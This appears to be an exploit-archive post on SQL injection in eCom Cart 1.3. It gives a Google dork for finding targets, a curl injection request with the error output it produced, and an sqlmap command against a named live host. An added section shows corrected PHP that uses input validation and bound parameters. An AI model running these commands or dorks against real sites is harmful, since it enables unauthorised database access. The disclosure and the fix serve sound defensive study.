[SAFE-ID: JIWO-2024-76]   Author: ecawen   Posted: [2017-07-17]

[Source: jiwo.org]

# Exploit Title: eCom Cart 1.3 Exploit
# Google Dork: inurl:"/pdetails/11" ([11] is variable)
# Date: 10.06.2017
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
# Version: 1.3
# Tested on: Linux
 
 
 
$ curl http://localhost/ecom-cart/charge.php -d order_id=%271
 
Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '1'' at line 1 in
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
Stack trace:
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
PDO->query('SELECT * FROM 3...')
#1 {main}
  thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
on line 16
 
$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php" --data=order_id=1 --dbs
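
The trace above shows the order_id POST value reaching PDO->query() as part of the SQL string, and the uncaught exception disclosing the server path and query text. The PHP below is an added example of the corrected pattern, not eCom Cart's code: the orders table, its columns, and the open_db/find_order helpers are hypothetical, and in-memory SQLite stands in for MariaDB so it runs offline.

```php
<?php
declare(strict_types=1);

// Added example; table, columns and helper names are hypothetical.
function open_db(): PDO
{
    // In-memory SQLite stands in for the MariaDB backend.
    // On MySQL/MariaDB, also set PDO::ATTR_EMULATE_PREPARES to false.
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE orders (id INTEGER PRIMARY KEY, total REAL)');
    $pdo->exec('INSERT INTO orders (id, total) VALUES (1, 19.90)'); // constructed row
    return $pdo;
}

function find_order(PDO $pdo, $rawOrderId): ?array
{
    // Accept only a positive integer; anything else never reaches the database.
    $orderId = filter_var($rawOrderId, FILTER_VALIDATE_INT,
                          ['options' => ['min_range' => 1]]);
    if ($orderId === false) {
        return null;
    }
    // Bound parameter: the value is sent as data and is never parsed as SQL.
    $stmt = $pdo->prepare('SELECT id, total FROM orders WHERE id = :id');
    $stmt->bindValue(':id', $orderId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Keep exception text out of responses; log it server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

$pdo = open_db();
try {
    var_dump(find_order($pdo, '1'));   // existing order: row is returned
    var_dump(find_order($pdo, "'1"));  // malformed value from the report: NULL
} catch (PDOException $e) {
    error_log('order lookup failed: ' . $e->getMessage());
    http_response_code(500);
    echo 'Internal error';
}
```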